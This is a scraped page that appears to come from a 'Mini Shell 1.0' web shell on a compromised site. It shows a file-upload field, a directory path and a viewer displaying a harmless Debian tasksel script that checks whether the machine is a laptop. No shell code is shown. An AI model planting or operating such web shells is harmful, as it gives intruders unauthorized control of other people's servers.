HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/lib/tasksel/tests/
Upload File :
Current File : //proc/1784574/root/usr/lib/tasksel/tests/laptop
#!/bin/sh
# Causes a task to be selected if the machine appears to be a laptop.

if [ "$NEW_INSTALL" ]; then
	if which laptop-detect >/dev/null 2>&1 && \
		laptop-detect; then
		exit 0 # hide; install
	else
		exit 1 # hide; do not install
	fi
else
	exit 3
fi